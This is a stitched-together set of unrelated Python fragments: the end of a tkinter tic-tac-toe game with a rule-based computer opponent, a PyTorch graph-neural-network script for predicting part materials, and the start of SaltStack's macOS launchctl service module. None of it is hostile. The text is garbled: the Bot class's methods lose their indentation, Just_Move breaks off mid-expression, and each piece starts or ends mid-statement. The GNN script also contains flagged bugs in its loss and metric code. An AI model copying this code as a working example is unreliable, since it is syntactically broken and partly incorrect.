            Stop = True
        if not Stop: self.EffectLoop = self.after(100, self.Effects)

    def win_check(self):
        """Scan the eight winning lines; update scores and reveal the line.

        Returns True on a win, False when the board is full with no winner
        (a draw), and None otherwise. Called repeatedly by Win_ChkLoop.
        """
        for i in self.Ai._Combo:
            if self._Data[i[0]] == 'X' and self._Data[i[1]] == 'X' and self._Data[i[2]] == 'X':
                self.CpScr += 1
                self.ComputerScore.configure(text=str(self.CpScr))
                # Reveal the canvas line matching the winning combo.
                for x, y in self.Draw._LineDic.items():
                    if i == y: self.Draw.itemconfig(x, state='normal')
                self.Move = False
                self.Restarting = False
                self.Win_ChkLoop.Pause()
                self.Restart(win=True)
                return True
            if self._Data[i[0]] == 'O' and self._Data[i[1]] == 'O' and self._Data[i[2]] == 'O':
                self.PlScr += 1
                self.PlayerScore.configure(text=str(self.PlScr))
                for x, y in self.Draw._LineDic.items():
                    if i == y: self.Draw.itemconfig(x, state='normal')
                self.Move = False
                self.Restarting = False
                self.Win_ChkLoop.Pause()
                self.Restart(win=True)
                return True
        if None not in self._Data.values():
            # Board full with no winner: a draw.
            self.Win_ChkLoop.Pause()
            self.Restart()
            return False

    def Restart(self, win=False):
        """Schedule a fresh round 1.5 s after a win or a full board."""
        def Reset():
            # Rebuild the canvas and AI for the next round, keeping scores.
            self.Round += 1
            self.RoundLB.configure(text=("Round: {}".format(self.Round)))
            self.Move = True
            self.Effect = True
            self.Restarting = True
            self.EffectCount = 0
            self.EffectCurrent = None
            self.EffectLoop = 0
            self._Data = {0: None, 1: None, 2: None, 3: None, 4: None, 5: None, 6: None, 7: None, 8: None}
            self.Draw.destroy()
            del self.Ai
            # self.update()
            self.Draw = _drawings(self, background=self.BgBlack,
                                  highlightbackground=self.BgWhite, highlightcolor=self.BgWhite)
            self.Draw.pack(side=LEFT)
            self.Ai = Bot(self, difficulty=self.difficulty)
            self.DiffLB2.config(text=self.difficulty.capitalize())
            self.Win_ChkLoop.Play()
        if None not in self._Data.values(): self.after(1500, Reset)
        if win: self.after(1500, Reset)
class _drawings(Canvas):
    """Game-board canvas: static grid lines, the (initially hidden) win
    lines, and hit-testing of mouse clicks onto the nine cells."""

    def __init__(self, master, *args, **kwargs):
        Canvas.__init__(self, master, kwargs)
        self.master = master
        self.configure(highlightthickness=1)
        self.config(width=350, height=300)
        self.start = None
        # Board grid (always visible; items 1-4 are recoloured by the
        # window's animation loop).
        self.create_line(125, 40, 125, 260, fill=self.master.BgWhite, width=4)
        self.create_line(215, 40, 215, 260, fill=self.master.BgWhite, width=4)
        self.create_line(50, 105, 290, 105, fill=self.master.BgWhite, width=4)
        self.create_line(50, 185, 290, 185, fill=self.master.BgWhite, width=4)
        # Win-indicator lines, revealed by FrameBody.win_check on a win.
        self.L012 = self.create_line(70, 70, 270, 70, fill=self.master.BgWhite, width=4, state='hidden')
        self.L345 = self.create_line(70, 145, 270, 145, fill=self.master.BgWhite, width=4, state='hidden')
        self.L678 = self.create_line(70, 220, 270, 220, fill=self.master.BgWhite, width=4, state='hidden')
        self.L147 = self.create_line(170, 60, 170, 240, fill=self.master.BgWhite, width=4, state='hidden')
        self.L036 = self.create_line(85, 60, 85, 240, fill=self.master.BgWhite, width=4, state='hidden')
        self.L258 = self.create_line(255, 60, 255, 240, fill=self.master.BgWhite, width=4, state='hidden')
        self.L048 = self.create_line(80, 60, 260, 230, fill=self.master.BgWhite, width=4, state='hidden')
        self.L246 = self.create_line(260, 60, 80, 230, fill=self.master.BgWhite, width=4, state='hidden')
        # Map each win line to the board cells it crosses.
        self._LineDic = {
            self.L012: [0, 1, 2],
            self.L345: [3, 4, 5],
            self.L678: [6, 7, 8],
            self.L147: [1, 4, 7],
            self.L036: [0, 3, 6],
            self.L258: [2, 5, 8],
            self.L048: [0, 4, 8],
            self.L246: [2, 4, 6],
        }

    def Click(self, x, y):
        """Hit-test a canvas coordinate.

        Returns (text_x, text_y, cell_index) for the board cell containing
        (x, y), or False when the click landed outside the board.
        """
        if x < 120 and y < 100 and x > 50 and y > 40: return 50+8, 40-8, 0
        if x < 210 and y < 100 and x > 130 and y > 40: return 135+8, 40-8, 1
        if x < 290 and y < 100 and x > 220 and y > 40: return 220+8, 40-8, 2
        if x < 120 and y < 190 and x > 50 and y > 120: return 50+8, 115-8, 3
        if x < 210 and y < 190 and x > 130 and y > 120: return 135+8, 115-8, 4
        if x < 290 and y < 190 and x > 220 and y > 120: return 220+8, 115-8, 5
        if x < 120 and y < 260 and x > 50 and y > 192: return 50+8, 192-8, 6
        if x < 210 and y < 260 and x > 130 and y > 192: return 135+8, 192-8, 7
        if x < 290 and y < 260 and x > 220 and y > 192: return 220+8, 192-8, 8
        return False

    def Human(self, evt=None):
        """Place the human player's mark at the clicked cell.

        Returns True when a mark was placed (the caller then schedules the
        computer's reply); None otherwise.
        """
        # Hit-test once and reuse the result (the original called Click twice).
        hit = self.Click(evt.x, evt.y)
        if hit and self.master.Move:
            x, y, p = hit
            if self.master._Data[p] is None:
                L = self.create_text(x, y, text="◯", font=Font(size=60),
                                     fill=self.master.BgWhite, anchor=NW)
                self.master.Sound_Effect()
                self.master.EffectCurrent = L
                self.master.Effects()
                self.master._Data.update({p: "O"})
                return True
class Bot(object):
def __init__(self, master, difficulty=None, *args, **kwargs):
    """AI opponent; strength is selected via *difficulty*
    ("easy"/"medium"/"hard"/"unbeatable")."""
    self.master = master
    self.Goonce = True         # lets Block2() fire only once per round
    self._Data = master._Data  # shared board dict: cell -> None/"O"/"X"
    self.Draw = master.Draw    # canvas used to render the computer's marks
    self.diff = difficulty
    # (player-held cell pair) -> cell to claim as a counter.
    # NOTE(review): tables appear hand-derived for specific fork patterns -
    # verify the pairs against actual play.
    self._TryBlock = { (1,6) : 0,
                       (1,8) : 2,
                       (7,2) : 8,
                       (7,0) : 6,
                       (3,8) : 6,
                       (3,2) : 0,
                       (5,0) : 2,
                       (5,6) : 8 }
    self._TryBlock2 = { (5,7) : 0,
                        (1,5) : 6,
                        (1,3) : 8,
                        (3,7) : 2 }
    self._AlreadyMoved = False
    # All eight winning lines (cells are numbered 0-8, row-major).
    self._Combo = ( [0, 1, 2],[0, 3, 6],[0, 4, 8],
                    [1, 4, 7],[2, 5, 8],[2, 4, 6],
                    [3, 4, 5],[6, 7, 8] )
    # Canvas coordinates for drawing the computer's mark in each cell:
    # (text_x, text_y, cell_index).
    self._Poisiton = ( ( 50+11, 40-2, 0),
                       (135+11, 40-2, 1),
                       (220+11, 40-2, 2),
                       ( 50+11, 115-2, 3),
                       (135+11, 115-2, 4),
                       (220+11, 115-2, 5),
                       ( 50+11, 192-2, 6),
                       (135+11, 192-2, 7),
                       (220+11, 192-2, 8) )
    self._Cornors = (0, 6, 8, 2)  # corner cells
    self._Sides = (1, 3, 5, 7)    # edge (side) cells
    self._Move = 0
def Move(self):
    """Perform the computer's move.

    Strategies are tried in priority order; higher difficulties unlock
    more of them. Returns True when a mark was placed, False when the
    board is full or input is locked, and None if no strategy fired.
    """
    if None in self._Data.values() and self.master.Move and self.master.Restarting:
        self.master.Sound_Effect()
        # Membership tests replace the original chains of `==` / `or`.
        if self.diff in ("unbeatable", "hard"):
            if self.Smart_Move():
                self._AlreadyMoved = True
                return True
        if self.diff == "unbeatable":
            if self.Block2():
                self._AlreadyMoved = True
                return True
        if self.diff in ("unbeatable", "medium", "hard", "easy"):
            if self.Aggressive_Move():
                self._AlreadyMoved = True
                return True
        if self.diff in ("unbeatable", "medium", "hard"):
            if self.Defensive_Move():
                self._AlreadyMoved = True
                return True
            if self.Block():
                self._AlreadyMoved = True
                return True
        if self.diff in ("unbeatable", "medium", "hard", "easy"):
            if self.Just_Move():
                self._AlreadyMoved = True
                return True
    else:
        return False
def Smart_Move(self):
    """Claim the centre square when it is free; returns True on success."""
    if self._Data[4] is not None:
        return False
    x, y, p = self._Poisiton[4]
    mark = self.Draw.create_text(x, y, text="╳", font=Font(size=50),
                                 fill=self.master.BgWhite, anchor=NW)
    self.master.EffectCurrent = mark
    self.master.Effects()
    self._Data.update({4: "X"})
    return True
def Aggressive_Move(self):
    """Complete any line that already holds two computer marks ("X").

    Returns True after drawing the winning mark; None when no line can be
    completed (matching the original fall-through behaviour). The three
    near-identical branches of the original are collapsed into one check.
    """
    for combo in self._Combo:
        marks = [self._Data[c] for c in combo]
        # Exactly two X's and one free square means the line can be won.
        if marks.count("X") == 2 and marks.count(None) == 1:
            target = combo[marks.index(None)]
            X, Y, p = self._Poisiton[target]
            L = self.Draw.create_text(X, Y, text="╳", font=Font(size=50),
                                      fill=self.master.BgWhite, anchor=NW)
            self.master.EffectCurrent = L
            self.master.Effects()
            self._Data.update({p: "X"})
            return True
def Defensive_Move(self):
    """Block an imminent win by the opponent ("O").

    Mirror image of ``Aggressive_Move``: when two cells of a winning
    combination hold "O" and the third is empty, play "X" there. The
    three duplicated branches are collapsed into a rotation loop and an
    explicit ``return False`` replaces the implicit ``None``.

    Returns:
        bool: True if a blocking move was played, False otherwise.
    """
    for combo in self._Combo:
        for empty_slot in range(3):
            first = combo[(empty_slot + 1) % 3]
            second = combo[(empty_slot + 2) % 3]
            if (self._Data[first] == "O" and self._Data[second] == "O"
                    and self._Data[combo[empty_slot]] is None):
                X, Y, p = self._Poisiton[combo[empty_slot]]
                L = self.Draw.create_text(X, Y, text="╳", font=Font(size=50),
                                          fill=self.master.BgWhite, anchor=NW)
                self.master.EffectCurrent = L
                self.master.Effects()
                self._Data.update({p: "X"})
                return True
    return False
def Block(self):
    """Counter an opponent corner play while the computer owns the centre.

    When any corner holds "O" and the centre holds "X", answer on a
    random free side cell (blocks the classic double-corner trap).

    Bug fix: the original called ``rnd.choice`` on the list of free side
    cells without checking it was non-empty, raising IndexError late in
    the game; it also fell through returning ``None``. Both paths now
    return False explicitly.

    Returns:
        bool: True if a blocking side move was played, False otherwise.
    """
    for corner in self._Cornors:
        if self._Data[corner] == "O" and self._Data[4] == "X":
            free_sides = [side for side in self._Sides
                          if self._Data[side] is None]
            if not free_sides:
                return False  # no side cell left to play
            choice = rnd.choice(free_sides)
            X, Y, p = self._Poisiton[choice]
            L = self.Draw.create_text(X, Y, text="╳", font=Font(size=50),
                                      fill=self.master.BgWhite, anchor=NW)
            self.master.EffectCurrent = L
            self.master.Effects()
            self._Data.update({p: "X"})
            return True
    return False
def Block2(self):
    """Block a known early-game trap, at most once per game.

    ``self._TryBlock`` maps a pair of opponent cells to the cell that
    neutralises that threat. The block is only attempted while the
    one-shot flag ``self.Goonce`` is set and at least six cells are
    still empty (i.e. within the first few moves). Adds an explicit
    ``return False`` and identity comparison with ``None``.

    Returns:
        bool: True if a trap was blocked, False otherwise.
    """
    empty_cells = list(self._Data.values()).count(None)
    for pair, target in self._TryBlock.items():
        if (self._Data[pair[0]] == "O" and self._Data[pair[1]] == "O"
                and self.Goonce and self._Data[target] is None
                and empty_cells >= 6):
            X, Y, p = self._Poisiton[target]
            L = self.Draw.create_text(X, Y, text="╳", font=Font(size=50),
                                      fill=self.master.BgWhite, anchor=NW)
            self.master.EffectCurrent = L
            self.master.Effects()
            self._Data.update({p: "X"})
            self.Goonce = False  # one-shot: never trigger again this game
            return True
    return False
def Just_Move(self):
ConTmp = []
SidTmp = []
tmp = True
for x in self._Cornors:
for i,j in self._TryBlock2.items():
if self._Data[i[0]]=="O" and self._Data[i[1]]=="O" \
and self._Data[x]==None and x!=j and | |
# <reponame>danielegrandi-adsk/material-gnn
import os
import time
import torch
import torch.nn as nn
import argparse
from tqdm import tqdm
import numpy as np
import json
import random
from pathlib import Path
import pandas as pd
from partial_algorithm.dataloader import DataSet, set_experiment, set_lazy_loading
from partial_algorithm.GNN import MLP, Linear, CustomizedGNN
from partial_algorithm.process_data import set_prediction
from torch.nn import functional as F
from sklearn.metrics import precision_score, recall_score, f1_score, classification_report
# Module-level experiment configuration; populated by set_global_variables().
ABLATION, PREDICTION, ITERATION, TOP_K = None, None, None, None
"""Reproducibility"""
# Seed every RNG source (torch CPU/CUDA, numpy, python) and force
# deterministic cuDNN behaviour so repeated runs give identical results.
seed = 0
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
np.random.seed(seed)
random.seed(seed)
torch.backends.cudnn.benchmark = False  # autotuner picks kernels non-deterministically
torch.backends.cudnn.deterministic = True
class CustomizedClassifier(object):
    """Train and evaluate a node-material classifier (GNN, MLP or Linear).

    One-hot material labels are appended to the node features for a random
    subset of nodes; the cross-entropy loss and the reported metrics are
    computed only over the *masked* nodes (mask value 0), i.e. the nodes
    that did NOT receive their own material as an input feature.

    NOTE(review): ``train``/``predict``/``predict_best_K`` read the
    module-level ``args`` (``args.network``) instead of stored state -
    confirm a global ``args`` always exists when these methods run.
    """

    def __init__(self, args):
        # Copy hyper-parameters off the argparse namespace.
        self.verbose = args.verbose
        self.device = torch.device(args.device)
        self.batch_size = args.batch_size
        self.num_epochs = args.num_epochs
        self.num_layers = args.num_layers
        self.num_materials = args.num_materials
        self.patience = args.patience  # early-stopping patience, in epochs
        self.node_dim = args.node_dim
        self.edge_dim = args.edge_dim
        self.hid_dim = args.hid_dim
        self.lr = args.lr
        # NOTE(review): self.num_class_l1/_l2/_l3 are never assigned in this
        # class, so the 'mlp'/'linear' branches would raise AttributeError -
        # presumably legacy/dead paths; confirm before relying on them.
        if args.network == 'mlp':
            self.model = MLP(self.node_dim, self.hid_dim, self.num_class_l1,
                             self.num_class_l2, self.num_class_l3).to(self.device)
        elif args.network == 'linear':
            self.model = Linear(self.node_dim, self.hid_dim, self.num_class_l1,
                                self.num_class_l2, self.num_class_l3).to(self.device)
        else:  # Default is here
            self.model = CustomizedGNN(self.node_dim, self.edge_dim, self.hid_dim,
                                       self.num_materials,
                                       self.num_layers, args.network).to(self.device)

    def load(self):
        """Restore model weights from ``checkpoint.pkl`` in the CWD."""
        if os.path.exists('checkpoint.pkl'):
            self.model.load_state_dict(torch.load('checkpoint.pkl'))
        else:
            raise Exception('Checkpoint not found ...')

    def train(self, train_loader, val_loader, weights, mask_amount, masked_val_nodes, permuted):
        """Train with Adam + cosine LR schedule and early stopping.

        weights: sequence of class-weight tensors; weights[0] weights the
        material cross-entropy. mask_amount: probability that a node DOES
        receive its material as an input feature. masked_val_nodes:
        precomputed 0/1 mask for the validation set. permuted: when True
        the mask comes from the dataset (``batch.mask``) instead of being
        sampled per epoch. The best (lowest val-loss) weights are restored
        and saved to ``checkpoint.pkl``.
        """
        best_loss, best_state, patience_count = 1e9, self.model.state_dict(), 0
        optimizer = torch.optim.Adam(self.model.parameters(), lr=self.lr)
        scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=self.num_epochs)
        weights_material = weights[0].to(self.device)
        for epoch in range(self.num_epochs):
            material_p, material_t = [], []
            self.model.train()
            epoch_loss = 0.
            start = time.time()
            for batch in train_loader:
                if not permuted:
                    materials_feature = F.one_hot(batch.material, self.num_materials)  # one-hot material vector
                    random_mask = np.random.choice([0, 1], size=len(batch.x), p=[1 - mask_amount,
                                                                                 mask_amount])  # Masked=0 -> node does not get extra material info
                    materials_feature = materials_feature * random_mask[:,
                                                            None]  # set materials_feature to zeros if masked
                    batch.x = torch.cat((batch.x, materials_feature), dim=1)  # add materials_feature to batch.x
                batch = batch.to(self.device)
                optimizer.zero_grad()
                if args.network in ('mlp', 'linear'):
                    logits_l1, logits_l2, logits_l3 = self.model(
                        batch.x.float(), F.one_hot(batch.y1, self.num_class_l1), F.one_hot(batch.y2, self.num_class_l2))
                else:  # by default
                    material_predictions = self.model(batch.x.float(), batch.edge_index, batch.e.float())
                # compute loss (with ground truth)
                if not permuted:
                    is_masked = torch.tensor([True if mask == 0 else False for mask in
                                              random_mask])  # true if the node did not get any more info about its label
                else:
                    is_masked = torch.tensor([True if node_mask == 0 else False for graph in batch.mask for node_mask in
                                              graph])  # true if the node did not get any more info about its label
                loss = nn.CrossEntropyLoss(weight=weights_material)(material_predictions[is_masked],
                                                                    batch.material[
                                                                        is_masked])  # only include in the loss nodes that are not masked
                # loss = nn.CrossEntropyLoss(weight=weights_material)(material_predictions, batch.material)
                # only append if not masked
                material_p.append(torch.argmax(material_predictions[is_masked], dim=-1))
                material_t.append(batch.material[is_masked])
                epoch_loss += loss.item()
                loss.backward()  # back propagation (compute gradients and update parameters)
                optimizer.step()  # optimizer takes one step
                # NOTE(review): stepping a CosineAnnealingLR with
                # T_max=num_epochs once per *batch* decays the LR far too
                # fast - confirm whether per-epoch stepping was intended.
                scheduler.step()  # scheduler takes one step
            end = time.time()
            val_loss, _, _, val_acc = self.predict(val_loader,
                                                   weights_material, masked_val_nodes,
                                                   mask_amount, permuted)  # evaluate and obtain loss on validation set
            material_p = torch.cat(material_p, -1)
            material_t = torch.cat(material_t, -1)
            train_acc = f1_score(y_true=material_t.cpu().numpy(),
                                 y_pred=material_p.cpu().numpy(), average="micro")
            if self.verbose:
                print(f'Epoch: {epoch + 1:03d}/{self.num_epochs} | Time: {end - start:.2f}s | '
                      f'Train Loss: {epoch_loss / len(train_loader):.4f} | Train Micro Acc: '
                      f'{100 * train_acc: .2f}% | Val Loss: {val_loss: .4f} | Val Micro Acc:'
                      f'{100 * val_acc: .2f}%')
            if best_loss > val_loss:  # if this state better than previous best, store it
                best_loss = val_loss
                best_state = self.model.state_dict()
                patience_count = 0
            else:
                patience_count += 1
                if patience_count == self.patience:
                    if self.verbose:
                        print('Early stopping ...')
                    break
        self.model.load_state_dict(best_state)
        print("Saving the model...")
        torch.save(best_state, 'checkpoint.pkl')

    @torch.no_grad()
    def predict(self, data_loader, weights_material, masked_val_nodes,
                mask_amount, permuted):  # data_loader is the testing/validation set
        """Evaluate on ``data_loader``.

        Returns (loss, predictions, targets, micro-F1) over masked nodes.

        NOTE(review): unlike ``train``, ``loss`` is *overwritten* (not
        accumulated) each batch and then divided by len(data_loader), so
        the returned value is last-batch-loss / num_batches. Looks like a
        bug (``loss +=`` intended) - it feeds early stopping, so confirm.
        """
        self.model.eval()  # set to evaluation
        loss = 0.
        material_p, material_t = [], []
        num_nodes = 0
        for batch in data_loader:
            if not permuted:
                # Pad with actual material info for nodes that are not masked, taking the mask from the dataset
                materials_feature = F.one_hot(batch.material, self.num_materials)  # one-hot material vector
                random_mask = masked_val_nodes[
                    num_nodes: num_nodes + len(batch.x)]  # Masked=0 -> node does not get extra material info
                try:
                    materials_feature = materials_feature * random_mask[:,
                                                            None]  # set materials_feature to zeros if masked
                except:
                    # NOTE(review): bare except + print() is a debugging
                    # leftover - on a shape mismatch the features are left
                    # UNmasked and evaluation silently continues; confirm.
                    print()
                batch.x = torch.cat((batch.x, materials_feature), dim=1)
            batch = batch.to(self.device)
            # x = node attributes; edge_index = 2 nodes to each edge; e = edge attributes
            if args.network in ('mlp', 'linear'):  # ignore this
                logits_l1, logits_l2, logits_l3 = self.model.predict(batch.x.float())
            else:
                material_predictions = self.model.predict(batch.x.float(), batch.edge_index, batch.e.float())
            if not permuted:
                is_masked = torch.tensor([True if mask == 0 else False for mask in
                                          random_mask])  # true if the node did not get any more info about its label
            else:
                is_masked = torch.tensor([True if node_mask == 0 else False for graph in batch.mask for node_mask in
                                          graph])  # true if the node did not get any more info about its label
            loss = nn.CrossEntropyLoss()(material_predictions[is_masked], batch.material[
                is_masked])  # only include in the loss nodes that are not masked
            # only append if not masked
            material_p.append(torch.argmax(material_predictions[is_masked], dim=-1))
            material_t.append(batch.material[is_masked])
            num_nodes += len(batch.x)
        loss /= len(data_loader)
        material_p = torch.cat(material_p, -1)
        material_t = torch.cat(material_t, -1)
        val_acc = f1_score(y_true=material_t.cpu().numpy(),
                           y_pred=material_p.cpu().numpy(), average="micro")
        return loss, material_p, material_t, val_acc

    @torch.no_grad()
    def predict_best_K(self, data_loader, weights_material, best_k, mask_amount, masked_test_nodes, permuted):
        """Evaluate with top-k scoring.

        A prediction counts as correct when the true material is among the
        ``best_k`` highest-scoring classes (the argmax is replaced by the
        ground truth in that case before computing F1).

        NOTE(review): same loss-overwrite issue as ``predict``. Also
        ``batch.material[entry]`` indexes the full (unmasked) tensor while
        ``predictions`` covers masked nodes only, so the two indexings may
        be misaligned - confirm.
        """
        self.model.eval()  # set to evaluation
        loss = 0.
        material_p, material_t = [], []
        batch_num = 0
        for batch in data_loader:
            if not permuted:
                # Pad with actual material info for nodes that are not masked, taking the mask from the dataset
                materials_feature = F.one_hot(batch.material, self.num_materials)  # one-hot material vector
                random_mask = masked_test_nodes[batch_num * len(batch.x): (batch_num + 1) * len(
                    batch.x)]  # Masked=0 -> node does not get extra material info
                materials_feature = materials_feature * random_mask[:, None]  # set materials_feature to zeros if masked
                batch.x = torch.cat((batch.x, materials_feature), dim=1)
            batch = batch.to(self.device)
            # x = node attributes; edge_index = 2 nodes to each edge; e = edge attributes
            if args.network in ('mlp', 'linear'):  # ignore this
                logits_l1, logits_l2, logits_l3 = self.model.predict(batch.x.float())
            else:
                material_predictions = self.model.predict(batch.x.float(), batch.edge_index, batch.e.float())
            if not permuted:
                is_masked = torch.tensor([True if mask == 0 else False for mask in
                                          random_mask])  # true if the node did not get any more info about its label
            else:
                is_masked = torch.tensor([True if node_mask == 0 else False for graph in batch.mask for node_mask in
                                          graph])  # true if the node did not get any more info about its label
            loss = nn.CrossEntropyLoss()(material_predictions[is_masked], batch.material[
                is_masked])  # only include in the loss nodes that are not masked
            # only append if not masked
            material_t.append(batch.material[is_masked])
            # Top K predictions
            if best_k == 1:
                material_p.append(torch.argmax(material_predictions[is_masked], dim=-1))
            else:
                predictions = torch.topk(material_predictions[is_masked], best_k).indices
                final_predictions = torch.argmax(material_predictions[is_masked], dim=-1)
                for entry in range(len(predictions)):
                    if batch.material[entry] in predictions[entry]:
                        final_predictions[entry] = batch.material[entry]
                    else:
                        pass
                material_p.append(final_predictions)
            batch_num += 1
        loss /= len(data_loader)
        material_p = torch.cat(material_p, -1)
        material_t = torch.cat(material_t, -1)
        raw_acc = f1_score(y_true=material_t.cpu().numpy(),
                           y_pred=material_p.cpu().numpy(), average="micro")
        return loss, material_p, material_t, raw_acc
def set_global_variables(experiment, prediction, topk, iteration, verbose=True):
    """Configure the module-level experiment settings.

    Validates ``prediction`` against the recognised targets (exiting the
    process on an invalid choice), stores the settings in the module
    globals and forwards them to the dataloader/processing modules.
    """
    global ABLATION, PREDICTION, TOP_K, ITERATION
    valid_targets = ("material_id", "material_category_tier_1", "material_category_full")
    if prediction not in valid_targets:
        print("ERROR: invalid prediction choice!")
        exit(1)
    PREDICTION, TOP_K, ITERATION, ABLATION = prediction, topk, iteration, experiment
    if verbose:
        print(f"Prediction: {PREDICTION} | Top K: {TOP_K} | Iteration: {ITERATION} | Ablation: {experiment}.")
    set_prediction(prediction)
    set_experiment(experiment)
def save_results(args, result):
    """Aggregate per-iteration test metrics and persist them.

    Fills mean/std/min/median/max into ``result['material test results']``,
    appends one summary row to ``logs/Training_Result.csv`` (creating the
    header on first use) and dumps the full args+result dict to
    ``logs/JSON/<hash>.json``. File layout and row contents are unchanged
    from the original; the repeated deep dict lookups and the four
    recomputations of ``hash(str(averaged_f1))`` are hoisted.

    NOTE(review): ``hash()`` on a str is salted per interpreter run
    (PYTHONHASHSEED), so the 'Hash' column / JSON filename differs between
    runs - confirm whether a stable digest (hashlib) is wanted.
    """
    scores = result['material test results']
    for measure in ['micro', 'macro', 'weighted']:  # stats across all iterations
        f1 = scores['f1'][measure]
        f1['max'] = np.max(f1['data'])
        f1['mean'] = np.mean(f1['data'])
        f1['median'] = np.median(f1['data'])
        f1['min'] = np.min(f1['data'])
        f1['std'] = np.std(f1['data'])
        precision = scores['precision'][measure]
        precision['mean'] = np.mean(precision['data'])
        precision['std'] = np.std(precision['data'])
        recall = scores['recall'][measure]
        recall['mean'] = np.mean(recall['data'])
        recall['std'] = np.std(recall['data'])
    if not os.path.exists('logs/'):
        os.makedirs('logs/')
    averaged_f1 = scores['f1']['micro']['mean']
    result_hash = hash(str(averaged_f1))  # computed once; used for CSV row and JSON filename
    columns = ['Down-sample', 'Ablation', 'Prediction', 'Top K', 'Iteration',
               'Averaged Result', 'Std', 'Worst', 'Median', 'Best', 'Hash']
    output_dir = Path("logs/Training_Result.csv")
    if not output_dir.exists():
        # First run: write an empty frame so the header exists before appending.
        pd.DataFrame(list(), columns=columns).to_csv("logs/Training_Result.csv")
    csv_row = [str(args.downsample), str(ABLATION), str(PREDICTION), str(TOP_K), str(ITERATION),
               str(round(scores['f1']['micro']['mean'], 4)),
               str(round(scores['f1']['micro']['std'], 2)),
               str(round(scores['f1']['micro']['min'], 4)),
               str(round(scores['f1']['micro']['median'], 4)),
               str(round(scores['f1']['micro']['max'], 4)),
               str(result_hash)]
    pd.DataFrame([csv_row], columns=columns).to_csv(
        "logs/Training_Result.csv", mode='a', header=False, index=True)
    if not os.path.exists('logs/JSON'):
        os.makedirs('logs/JSON')
    with open(f'logs/JSON/{result_hash}.json', 'w') as f:
        json.dump({**args.__dict__, **result}, f, indent=2)
def save_results_tuning(args, result, network, num_layers, hid_dim, mask_amount):
for measure | |
# <filename>salt/modules/mac_service.py
# -*- coding: utf-8 -*-
'''
The service module for Mac OS X
.. versionadded:: 2016.3.0
'''
from __future__ import absolute_import
# Import python libs
import logging
import os
import re
import plistlib
from distutils.version import LooseVersion
# Import salt libs
import salt.utils
import salt.utils.decorators as decorators
import salt.ext.six as six
from salt.exceptions import CommandExecutionError
# Module-level logger, named after this module
log = logging.getLogger(__name__)
# Define the module's virtual name
__virtualname__ = 'service'
def __virtual__():
    '''
    Only for Mac OS X with launchctl
    '''
    load_error = 'Failed to load the mac_service module:\n'
    if not salt.utils.is_darwin():
        return (False, load_error + 'Only available on Mac OS X systems.')
    if not os.path.exists('/bin/launchctl'):
        return (False, load_error + 'Required binary not found: "/bin/launchctl"')
    if LooseVersion(__grains__['osrelease']) < LooseVersion('10.11'):
        return (False, load_error + 'Requires OS X 10.11 or newer')
    return __virtualname__
def _launchd_paths():
'''
Paths where launchd services can be found
'''
return [
'/Library/LaunchAgents',
'/Library/LaunchDaemons',
'/System/Library/LaunchAgents',
'/System/Library/LaunchDaemons',
]
@decorators.memoize
def _available_services():
    '''
    Return a dictionary of all available services on the system

    Walks every launchd directory, parses each plist (falling back to
    ``plutil`` for binary plists) and keys the result by the service's
    lower-cased Label.
    '''
    available_services = dict()
    for launch_dir in _launchd_paths():
        for root, dirs, files in os.walk(launch_dir):
            for filename in files:
                file_path = os.path.join(root, filename)
                # Follow symbolic links of files in _launchd_paths
                true_path = os.path.realpath(file_path)
                # ignore broken symlinks
                if not os.path.exists(true_path):
                    continue
                try:
                    # This assumes most of the plist files
                    # will be already in XML format
                    with salt.utils.fopen(file_path):
                        plist = plistlib.readPlist(true_path)
                except Exception:
                    # If plistlib is unable to read the file we'll need to use
                    # the system provided plutil program to do the conversion
                    cmd = '/usr/bin/plutil -convert xml1 -o - -- "{0}"'.format(
                        true_path)
                    plist_xml = __salt__['cmd.run_all'](
                        cmd, python_shell=False)['stdout']
                    if six.PY2:
                        plist = plistlib.readPlistFromString(plist_xml)
                    else:
                        plist = plistlib.readPlistFromBytes(
                            salt.utils.to_bytes(plist_xml))
                # BUG FIX: plists parse to dicts, and attribute access
                # (plist.Label) raises AttributeError on Python 3. Item
                # access works on both Python 2 and Python 3.
                available_services[plist['Label'].lower()] = {
                    'filename': filename,
                    'file_path': true_path,
                    'plist': plist,
                }
    return available_services
def _service_by_name(name):
    '''
    Return the service info for a service by label, filename or path
    '''
    services = _available_services()
    target = name.lower()
    # Fast path: exact label match
    if target in services:
        return services[target]
    # Otherwise match on the plist's full path or its basename
    for info in six.itervalues(services):
        path_matches = info['file_path'].lower() == target
        base_matches = os.path.splitext(info['filename'])[0].lower() == target
        if path_matches or base_matches:
            return info
    return False
def start(service_path, domain='system'):
    '''
    Bootstraps domains and services. The service is enabled, bootstrapped
    and kickstarted. See `man launchctl` on a Mac OS X El Capitan system
    for more details.

    .. note::
        If the service already exists it will be restarted

    :param str service_path: Full path to the plist file

    :param str domain: Target domain. May be one of the following:
        - system : this is the default
        - user/<uid> : <uid> is the user id
        - login/<asid> : <asid> is the audit session id
        - gui/<uid> : <uid> is the user id
        - session/<asid> : <asid> is the audit session id
        - pid/<pid> : <pid> is the process id

    :return: True if Successful, False if not or if the service is already
        started
    :rtype: bool

    CLI Example:

    .. code-block:: bash

        salt '*' service.start /System/Library/LaunchDaemons/org.cups.cupsd.plist
    '''
    if not os.path.exists(service_path):
        raise CommandExecutionError(
            'Service Path not found:\n'
            'Path: {0}'.format(service_path))

    # launchctl addresses a service as <domain>/<name>
    service_name = os.path.splitext(os.path.basename(service_path))[0]
    sep = '' if domain.endswith('/') else '/'
    service_target = '{0}{1}{2}'.format(domain, sep, service_name)

    # Already running: nothing to do
    if service_name in get_all():
        return False

    def _launchctl(cmd, action, tolerate=None):
        # Run one launchctl step, raising a detailed error on failure.
        # ``tolerate`` is a stderr substring that downgrades a failure
        # to a no-op (used for "service already loaded" on bootstrap).
        ret = __salt__['cmd.run_all'](cmd, python_shell=False)
        if ret['retcode'] and not (tolerate and tolerate in ret['stderr']):
            raise CommandExecutionError(
                'Failed to {0} service:\n'
                'Path: {1}\n'
                'Error: {2}\n'
                'StdOut: {3}'.format(action, service_path,
                                     ret['stderr'], ret['stdout']))

    _launchctl(['launchctl', 'enable', service_target], 'enable')
    _launchctl(['launchctl', 'bootstrap', domain, service_path], 'bootstrap',
               tolerate='service already loaded')
    _launchctl(['launchctl', 'kickstart', '-kp', service_target], 'kickstart')

    return service_name in get_all()
def stop(service_path, domain='system'):
    '''
    Removes (bootout) domains and services. The service is disabled and removed
    from the bootstrap. See `man launchctl` on a Mac OS X El Capitan system for
    more details.

